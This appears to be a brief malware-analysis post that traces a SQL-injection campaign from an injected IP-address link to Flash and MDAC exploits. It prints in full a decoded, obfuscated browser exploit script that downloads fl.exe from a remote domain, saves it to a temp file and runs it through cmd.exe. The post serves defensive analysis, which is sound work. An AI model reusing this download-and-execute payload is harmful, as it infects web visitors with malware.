61.31 235.114

foolishness or desperate? Sql-injection attack which links to an ip address instead of domain.

The injected script link is 61.31.235.114/i.swf

However i.swf currently does not exist on the machine. What exists is 1.swf.

1.swf contains iframe src=http://61.31.235.114/flash.htm

flash.htm contains 2 attack scripts.

The first exploits adobe flash player vulnerability – fl/ifl.html and fl/ffl.html
The second exploits MDAC vulnerability. The decoded script is as follows:

<SCRIPT>
DZ="http://jmrlmgg.cn/fl.exe";
aolslslx="";
function GnMs(n)
{
var numberMs = Math.random()*n;
return "\x7E\x54\x65\x6D\x70"+Math.round(numberMs)+"\x2E\x74\x6D\x70";
}
try
{
aolslslx="";
var Bf=document.createElement("\x6F\x62\x6A\x65\x63\x74");
Bf.setAttribute("\x63\x6C\x61\x73\x73\x69\x64","\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");
var Kx=Bf.CreateObject("\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58"+"\x4D\x4C\x48\x54\x54\x50","");
var AS=Bf.CreateObject("\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D","");
aolslslx="";
AS.type=1;
aolslslx="";
Kx.open("\x47\x45\x54", DZ,0);
aolslslx="";
Kx.send();
aolslslx="";
Ns1=GnMs(9999);
aolslslx="";
var cF=Bf.CreateObject("\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","");
var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","");
ok1=cF.BuildPath(NsTmp+"\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32","\x63\x6D\x64\x2E\x65\x78\x65");
q.SHeLLExecute(ok1,"\x20\x2F\x63 "+Ns1,"","\x6F\x70\x65\x6E",0);
aolslslx="";
}
catch(MsI) { MsI=1; }
aolslslx="";
</SCRIPT>

VirusTotal analysis of http://jmrlmgg.cn/fl.exe